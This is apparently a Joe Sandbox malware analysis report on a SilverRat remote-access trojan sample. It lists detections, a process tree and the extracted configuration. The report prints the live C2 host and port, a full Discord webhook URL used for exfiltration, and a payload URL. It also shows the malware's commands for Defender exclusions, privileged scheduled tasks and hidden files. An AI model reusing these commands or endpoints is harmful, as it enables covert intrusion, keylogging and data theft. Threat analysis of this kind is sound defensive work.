Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RLesaPFXew.exe

Overview

General Information

Sample name:RLesaPFXew.exe
renamed because original name is a hash value
Original sample name:aa80b2971f14c91c4a09162357188bf73d0f9934.exe
Analysis ID:1552938
MD5:537b270c2278044e4c3958530f745ece
SHA1:aa80b2971f14c91c4a09162357188bf73d0f9934
SHA256:3147922611475a9c92e23a018bf666a4890f2c3aa159b235883beff80cffb71a
Tags:exesilverratuser-NDA0E
Infos:

Detection

SilverRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected SilverRat
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys to launch java
Exploit detected, runtime environment starts unknown processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic

Classification

Process Tree

  • System is w10x64
  • RLesaPFXew.exe (PID: 5576 cmdline: "C:\Users\user\Desktop\RLesaPFXew.exe" MD5: 537B270C2278044E4C3958530F745ECE)
    • attrib.exe (PID: 6404 cmdline: "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2192 cmdline: "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java\$77java.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 3172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6068 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4B52.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 5692 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • $77java.exe (PID: 2940 cmdline: "C:\Users\user\java\$77java.exe" MD5: 537B270C2278044E4C3958530F745ECE)
        • schtasks.exe (PID: 5704 cmdline: "schtasks.exe" /query /TN $77java.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7012 cmdline: "schtasks.exe" /Create /SC ONCE /TN "$77java.exe" /TR "C:\Users\user\java\$77java.exe \"\$77java.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 1864 cmdline: "schtasks.exe" /query /TN $77java.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 3704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 2020 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • schtasks.exe (PID: 6252 cmdline: "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "java_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00 MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 3468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • $77java.exe (PID: 3000 cmdline: C:\Users\user\java\$77java.exe "\$77java.exe" /AsAdmin MD5: 537B270C2278044E4C3958530F745ECE)
  • cleanup

Malware Configuration

Threatname: SilverRat

{"Mutex": "SilverMutex_vhcVsDtDDi", "Host": "23.ip.gl.ply.gg", "Port": "52996", "Relay Connect": "4", "Version": "1.0.0.0", "Discord Url": "https://discordapp.com/api/webhooks/1294921166322139216/xs9PPlodeSrCXniTlxP1AWYgIlBu-KYxj9_7pK95qOS4ZhheXZuWsNfenaXEjnMgG__0"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
RLesaPFXew.exeJoeSecurity_SilverRatYara detected SilverRatJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\java\$77java.exeJoeSecurity_SilverRatYara detected SilverRatJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.2129565272.00000000001D2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_SilverRatYara detected SilverRatJoe Security
        00000000.00000002.2158375099.0000000003AE9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SilverRatYara detected SilverRatJoe Security
          Process Memory Space: RLesaPFXew.exe PID: 5576JoeSecurity_SilverRatYara detected SilverRatJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.RLesaPFXew.exe.1d0000.0.unpackJoeSecurity_SilverRatYara detected SilverRatJoe Security
              0.2.RLesaPFXew.exe.3af8618.0.unpackJoeSecurity_SilverRatYara detected SilverRatJoe Security
                0.2.RLesaPFXew.exe.3af8618.0.raw.unpackJoeSecurity_SilverRatYara detected SilverRatJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\java\$77java.exe" , ParentImage: C:\Users\user\java\$77java.exe, ParentProcessId: 2940, ParentProcessName: $77java.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, ProcessId: 616, ProcessName: powershell.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\java\$77java.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RLesaPFXew.exe, ProcessId: 5576, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\(Default)
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\java\$77java.exe" , ParentImage: C:\Users\user\java\$77java.exe, ParentProcessId: 2940, ParentProcessName: $77java.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, ProcessId: 616, ProcessName: powershell.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\java\$77java.exe" , ParentImage: C:\Users\user\java\$77java.exe, ParentProcessId: 2940, ParentProcessName: $77java.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, ProcessId: 616, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-09T22:53:23.175080+010020229301A Network Trojan was detected52.149.20.212443192.168.2.649745TCP
                  2024-11-09T22:53:50.697780+010020229301A Network Trojan was detected52.149.20.212443192.168.2.660572TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: RLesaPFXew.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: 23.ip.gl.ply.ggAvira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\java\$77java.exeAvira: detection malicious, Label: HEUR/AGEN.1313050
                  Found malware configuration
                  Source: RLesaPFXew.exeMalware Configuration Extractor: SilverRat {"Mutex": "SilverMutex_vhcVsDtDDi", "Host": "23.ip.gl.ply.gg", "Port": "52996", "Relay Connect": "4", "Version": "1.0.0.0", "Discord Url": "https://discordapp.com/api/webhooks/1294921166322139216/xs9PPlodeSrCXniTlxP1AWYgIlBu-KYxj9_7pK95qOS4ZhheXZuWsNfenaXEjnMgG__0"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\java\$77java.exeReversingLabs: Detection: 65%
                  Multi AV Scanner detection for submitted file
                  Source: RLesaPFXew.exeReversingLabs: Detection: 65%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\java\$77java.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: RLesaPFXew.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: RLesaPFXew.exeString decryptor: -|S.S.S|-
                  Source: RLesaPFXew.exeString decryptor: 23.ip.gl.ply.gg
                  Source: RLesaPFXew.exeString decryptor: 52996
                  Source: RLesaPFXew.exeString decryptor: https://discordapp.com/api/webhooks/1294921166322139216/xs9PPlodeSrCXniTlxP1AWYgIlBu-KYxj9_7pK95qOS4ZhheXZuWsNfenaXEjnMgG__0
                  Source: RLesaPFXew.exeString decryptor: https://g.top4top.io/p_2522c7w8u1.png
                  Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.6:49710 version: TLS 1.2
                  Source: RLesaPFXew.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Software Vulnerabilities

                  barindex
                  Exploit detected, runtime environment starts unknown processes
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 23.ip.gl.ply.gg
                  Source: global trafficTCP traffic: 192.168.2.6:49711 -> 147.185.221.23:52996
                  Source: global trafficHTTP traffic detected: POST /api/webhooks/1294921166322139216/xs9PPlodeSrCXniTlxP1AWYgIlBu-KYxj9_7pK95qOS4ZhheXZuWsNfenaXEjnMgG__0 HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: discordapp.comContent-Length: 415Expect: 100-continueConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 147.185.221.23 147.185.221.23
                  Source: Joe Sandbox ViewIP Address: 162.159.133.233 162.159.133.233
                  Source: Joe Sandbox ViewIP Address: 162.159.133.233 162.159.133.233
                  Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49745
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:60572
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: discordapp.com
                  Source: global trafficDNS traffic detected: DNS query: 23.ip.gl.ply.gg
                  Source: unknownHTTP traffic detected: POST /api/webhooks/1294921166322139216/xs9PPlodeSrCXniTlxP1AWYgIlBu-KYxj9_7pK95qOS4ZhheXZuWsNfenaXEjnMgG__0 HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: discordapp.comContent-Length: 415Expect: 100-continueConnection: Keep-Alive
                  Source: $77java.exe, 0000000D.00000002.3392526779.000000001DC52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                  Source: $77java.exe, 0000000D.00000002.3389411382.0000000003A6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discordapp.com
                  Source: $77java.exe, 0000000D.00000002.3392526779.000000001DC52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co4yL
                  Source: RLesaPFXew.exe, 00000000.00000002.2158375099.0000000003621000.00000004.00000800.00020000.00000000.sdmp, $77java.exe, 0000000D.00000002.3389411382.0000000003689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: $77java.exe, 0000000D.00000002.3392526779.000000001DC52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                  Source: $77java.exe, 0000000D.00000002.3389411382.00000000039CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com
                  Source: $77java.exe, 00000018.00000002.2206569086.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/webhooks/1294921166322139216/xs9PPlodeSrCXniTlxP1AWYgIlBu-KYxj9_7pK95qOS4
                  Source: $77java.exe, 00000018.00000002.2206569086.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.top4top.io/p_2522c7w8u
                  Source: $77java.exe, 00000018.00000002.2206569086.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.top4top.io/p_2522c7w8u1.png
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.6:49710 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Yara detected SilverRat
                  Source: Yara matchFile source: RLesaPFXew.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.RLesaPFXew.exe.1d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RLesaPFXew.exe.3af8618.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RLesaPFXew.exe.3af8618.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.2129565272.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2158375099.0000000003AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RLesaPFXew.exe PID: 5576, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\java\$77java.exe, type: DROPPED
                  Contains functionality to log keystrokes (.Net Source)
                  Source: RLesaPFXew.exe, Keyloaggr.cs.Net Code: KeyboardLayout
                  Source: $77java.exe.0.dr, Keyloaggr.cs.Net Code: KeyboardLayout
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeCode function: 0_2_00007FFD34697C15 NtSetValueKey,0_2_00007FFD34697C15
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeCode function: 0_2_00007FFD34697C79 NtSetValueKey,0_2_00007FFD34697C79
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeCode function: 0_2_00007FFD346960C20_2_00007FFD346960C2
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeCode function: 0_2_00007FFD346919580_2_00007FFD34691958
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeCode function: 0_2_00007FFD346953160_2_00007FFD34695316
                  Source: C:\Users\user\java\$77java.exeCode function: 13_2_00007FFD346860C213_2_00007FFD346860C2
                  Source: C:\Users\user\java\$77java.exeCode function: 13_2_00007FFD3468191013_2_00007FFD34681910
                  Source: C:\Users\user\java\$77java.exeCode function: 13_2_00007FFD346818E813_2_00007FFD346818E8
                  Source: C:\Users\user\java\$77java.exeCode function: 13_2_00007FFD3468531613_2_00007FFD34685316
                  Source: RLesaPFXew.exeStatic PE information: No import functions for PE file found
                  Source: $77java.exe.0.drStatic PE information: No import functions for PE file found
                  Source: RLesaPFXew.exe, 00000000.00000002.2158375099.0000000003AE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEverything.exe4 vs RLesaPFXew.exe
                  Source: RLesaPFXew.exe, 00000000.00000000.2129580710.00000000001DE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEverything.exe4 vs RLesaPFXew.exe
                  Source: RLesaPFXew.exeBinary or memory string: OriginalFilenameEverything.exe4 vs RLesaPFXew.exe
                  Source: RLesaPFXew.exe, Settings.csCryptographic APIs: 'CreateDecryptor'
                  Source: $77java.exe.0.dr, Settings.csCryptographic APIs: 'CreateDecryptor'
                  Source: RLesaPFXew.exe, Settings.csTask registration methods: 'CreateShTasks'
                  Source: $77java.exe.0.dr, Settings.csTask registration methods: 'CreateShTasks'
                  Source: RLesaPFXew.exe, Settings.csBase64 encoded string: 'MIIE4DCCAsigAwIBAgIQAKQYOfZd86J2BfNjhG4CWTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZTaWx2ZXIwIBcNMjIwODI2MTkwMTA4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlNpbHZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAPbpOWfhZTuOfEaqqImTTe5dNHAAry7/mf00DCoI4lPZfypsc1tYraxSPFeayGu09a3qdhkWKSVIgwnu2n4GLQNOCY9fh/1oyrX4Iir3BIkYeU7pKTWgjhUlAmFAUAaNr0ca23Ku2kN79jrDzRznOgE2DEW4p7OiM4Mb097ma9lzu7MyssHbY4VCteAhj9HZiplqBxaC1vXDmzxqG+gUZ1aLcyG7ssdkOjtWVBgT3gD/gOl7KchRzCFB1egDC/vD9WZCG35U3Ngi+IkTznoXR1R06cq4v0UnGjE37R2vcB21qb0ZYNiZJXZHv5i9+R7xoPeNoLda5PqnfGGbhPvNEdD56mdcOKlzGIuyemLkUo8texdpiBWKbtc3JZf5VsKxjJtHDK3xW6gDGI+PAirzGkFPmwcf8WgsblvzLg8OZpVxVs8rmKWoi6qIrf4CXnyl73J4lgzW+ir7PjANAQXwLNGdNnvdMeLeo/muGQPdeNpr6OczGGnkWA4qniHeL51/Gx0a8A+jP9zKiyu+qHcsP2IotgWDH/KlzJVr7IAum+DV92uV8poTDcUNcHaKvhHA65KmEtsvLbK6lFZcAMC0eWC0VgpW44T1/16rOaaky5mP6rTMc3nSyOl/lU/XgAgGGQPe22bRLWYzd3WVeEpI1WnHYXS+tL9IOe4kJP+pYsWDAgMBAAGjMjAwMB0GA1UdDgQWBBR32TJj2LeUx9L+RcSOvmFV6VJq6TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA+qucSOi7ov7Q1FmAjMf925KuvKuCNwJiu3Sqo3FDGVAD1fAwAi2FdyuXEO2VIUPZCkalFcBna5rqyrc6tcS4T0IL2TsYLrsuGir7PWP7CAcft1urYS1HpNpHxeH/nixwnQaQs/MuRmdm2TeCj6G21P5BTW55U5y9sMPSYwhbD2N7XLgnSQd5Y+80TR7FUiye/k3D37fI9PRhSQGbfYFRQQTmxj84dPTnY5CVgaY9d8fNiFZkyjaZdf+mibK0xQTf+xLVVj+toDNCkc1F462TdmFhCrHd4PoMo0yLDNv4SC6NLRq4haWDRtORw6gd5GYIoCQ3m3oQvNlNxXhhIjsOyxkxOrkCD0c+57PIc7EmKXieJa/XxnkcIVxO8dvTY/vijuz/VaZYl/lPu9ckuqgJ1wRvvsHl70Trv4Mn4X5uCIqRFFlK/mSOZbLIguGkDN3QIZABvej89vlZMhrVfZOG2oawe23FskHjv7thF/WzOXtWw6RUVC1V+hCwbuxFNUjZmmOTUwdXHnus7I2AuiG6Jz1+y9aYiXBcVTdSljxjHRRmiRaAnY94h58vN8NJ4hKL2GVCo6LxkpuplmcntJN0cKraKTPxSXcCRrqWxX9qoIbfvBcUU4vH1jPJCCLNCuDyD3lgQkpPVvq0EMU1a2HFGgMEQMjpYpb38rcadDhT5ag==', 'XX4Iz5kAK/EAkTqnGs7iFMG9nBFshn90zyvdo/rg7Bn+3lPgEwqvKSsalPTz/JNq'
                  Source: RLesaPFXew.exe, Installation.csBase64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBiLlp486XC9OZHtGsiixnNW'
                  Source: RLesaPFXew.exe, MessageRead.csBase64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBhStm9RR7V2byuc2qvN4qWd'
                  Source: $77java.exe.0.dr, Settings.csBase64 encoded string: 'MIIE4DCCAsigAwIBAgIQAKQYOfZd86J2BfNjhG4CWTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZTaWx2ZXIwIBcNMjIwODI2MTkwMTA4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlNpbHZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAPbpOWfhZTuOfEaqqImTTe5dNHAAry7/mf00DCoI4lPZfypsc1tYraxSPFeayGu09a3qdhkWKSVIgwnu2n4GLQNOCY9fh/1oyrX4Iir3BIkYeU7pKTWgjhUlAmFAUAaNr0ca23Ku2kN79jrDzRznOgE2DEW4p7OiM4Mb097ma9lzu7MyssHbY4VCteAhj9HZiplqBxaC1vXDmzxqG+gUZ1aLcyG7ssdkOjtWVBgT3gD/gOl7KchRzCFB1egDC/vD9WZCG35U3Ngi+IkTznoXR1R06cq4v0UnGjE37R2vcB21qb0ZYNiZJXZHv5i9+R7xoPeNoLda5PqnfGGbhPvNEdD56mdcOKlzGIuyemLkUo8texdpiBWKbtc3JZf5VsKxjJtHDK3xW6gDGI+PAirzGkFPmwcf8WgsblvzLg8OZpVxVs8rmKWoi6qIrf4CXnyl73J4lgzW+ir7PjANAQXwLNGdNnvdMeLeo/muGQPdeNpr6OczGGnkWA4qniHeL51/Gx0a8A+jP9zKiyu+qHcsP2IotgWDH/KlzJVr7IAum+DV92uV8poTDcUNcHaKvhHA65KmEtsvLbK6lFZcAMC0eWC0VgpW44T1/16rOaaky5mP6rTMc3nSyOl/lU/XgAgGGQPe22bRLWYzd3WVeEpI1WnHYXS+tL9IOe4kJP+pYsWDAgMBAAGjMjAwMB0GA1UdDgQWBBR32TJj2LeUx9L+RcSOvmFV6VJq6TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA+qucSOi7ov7Q1FmAjMf925KuvKuCNwJiu3Sqo3FDGVAD1fAwAi2FdyuXEO2VIUPZCkalFcBna5rqyrc6tcS4T0IL2TsYLrsuGir7PWP7CAcft1urYS1HpNpHxeH/nixwnQaQs/MuRmdm2TeCj6G21P5BTW55U5y9sMPSYwhbD2N7XLgnSQd5Y+80TR7FUiye/k3D37fI9PRhSQGbfYFRQQTmxj84dPTnY5CVgaY9d8fNiFZkyjaZdf+mibK0xQTf+xLVVj+toDNCkc1F462TdmFhCrHd4PoMo0yLDNv4SC6NLRq4haWDRtORw6gd5GYIoCQ3m3oQvNlNxXhhIjsOyxkxOrkCD0c+57PIc7EmKXieJa/XxnkcIVxO8dvTY/vijuz/VaZYl/lPu9ckuqgJ1wRvvsHl70Trv4Mn4X5uCIqRFFlK/mSOZbLIguGkDN3QIZABvej89vlZMhrVfZOG2oawe23FskHjv7thF/WzOXtWw6RUVC1V+hCwbuxFNUjZmmOTUwdXHnus7I2AuiG6Jz1+y9aYiXBcVTdSljxjHRRmiRaAnY94h58vN8NJ4hKL2GVCo6LxkpuplmcntJN0cKraKTPxSXcCRrqWxX9qoIbfvBcUU4vH1jPJCCLNCuDyD3lgQkpPVvq0EMU1a2HFGgMEQMjpYpb38rcadDhT5ag==', 'XX4Iz5kAK/EAkTqnGs7iFMG9nBFshn90zyvdo/rg7Bn+3lPgEwqvKSsalPTz/JNq'
                  Source: $77java.exe.0.dr, Installation.csBase64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBiLlp486XC9OZHtGsiixnNW'
                  Source: $77java.exe.0.dr, MessageRead.csBase64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBhStm9RR7V2byuc2qvN4qWd'
                  Source: $77java.exe.0.dr, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: $77java.exe.0.dr, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: RLesaPFXew.exe, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: RLesaPFXew.exe, GetInformationOS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@32/10@2/2
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeFile created: C:\Users\user\javaJump to behavior
                  Source: C:\Users\user\java\$77java.exeMutant created: NULL
                  Source: C:\Users\user\java\$77java.exeMutant created: \Sessions\1\BaseNamedObjects\SilverMutex_vhcVsDtDDi
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3704:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:712:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:120:WilError_03
